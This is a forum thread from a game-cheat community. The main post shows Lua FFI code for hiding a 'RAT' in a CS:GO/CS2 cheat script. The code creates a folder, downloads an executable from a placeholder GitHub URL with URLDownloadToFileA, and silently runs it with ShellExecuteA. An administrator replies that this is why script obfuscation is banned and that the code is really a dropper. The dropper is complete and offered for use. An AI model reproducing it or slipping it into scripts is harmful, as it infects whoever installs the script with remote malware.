What's new

Welcome to HvH Forum!

SignUp Now! Download Free HvH CS2/CS:GO Cheats, CFG, LUA/JS Scripts, And More!


SignUp Now!

Source Code Exploit How to insert a RAT into a LUA Script

TorDB.xyz Owner & Developer
User ID
79083
Messages
6
Reactions
5
Level
1
I think everyone knows about this but i will still share it here. this is how you Insert a RAT insto a lua script for any csgo/cs2 cheat.

You can create a Lua RAT for every cheat what has Lua API or the API allows shell ext.

Code:
ffi.cdef[[

    typedef int(__thiscall* get_clipboard_text_count)(void*);

    typedef void(__thiscall* set_clipboard_text)(void*, const char*, int);

    typedef void(__thiscall* get_clipboard_text)(void*, int, const char*, int);

    bool CreateDirectoryA(const char* lpPathName, void* lpSecurityAttributes);

    void* __stdcall URLDownloadToFileA(void* LPUNKNOWN, const char* LPCSTR, const char* LPCSTR2, int a, int LPBINDSTATUSCALLBACK);

    void* __stdcall ShellExecuteA(void* hwnd, const char* op, const char* file, const char* params, const char* dir, int show_cmd);

    bool DeleteUrlCacheEntryA(const char* lpszUrlName);



    typedef int(__fastcall* clantag_t)(const char*, const char*);



    bool CreateDirectoryA(const char* lpPathName, void* lpSecurityAttributes);

    void* __stdcall URLDownloadToFileA(void* LPUNKNOWN, const char* LPCSTR, const char* LPCSTR2, int a, int LPBINDSTATUSCALLBACK);

    void* __stdcall ShellExecuteA(void* hwnd, const char* op, const char* file, const char* params, const char* dir, int show_cmd);

  

    int MessageBoxA(void *w, const char *txt, const char *cap, int type);



    int ShellExecuteA(void* hwnd, const char* lpOperation, const char* lpFile, const char* lpParameters, const char* lpDirectory, int nShowCmd);

]]

local Shell32 = ffi.load 'Shell32.dll'

local urlmon = ffi.load 'UrlMon'

local wininet = ffi.load 'WinInet'

ffi.C.CreateDirectoryA("C:\\ratted", nil)

wininet.DeleteUrlCacheEntryA("https://github.com/username/repository/raw/main/rat.exe")

urlmon.URLDownloadToFileA(nil, "https://github.com/username/repository/raw/main/rat.exe", "C:\\ratted\\rat.exe", 0,0)

Shell32.ShellExecuteA(nil, 'open', "C:\\ratted\\rat.exe", nil, nil, 0)

ffi.C.MessageBoxA(nil, "RATTED!!", "RATTED", 0x00004000)
 
Last edited by a moderator:
I'm not Plisskien
Administrator
User ID
1
Messages
1,235
Reactions
3,784
Level
99
Good example, this is why we have this rule
where any script obfuscation is banned

Also I would rather call it dropper/downloader than RAT, because RAT is remote access trojan, thread name is misleading
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Log in

Already have an account? Log in here.

Top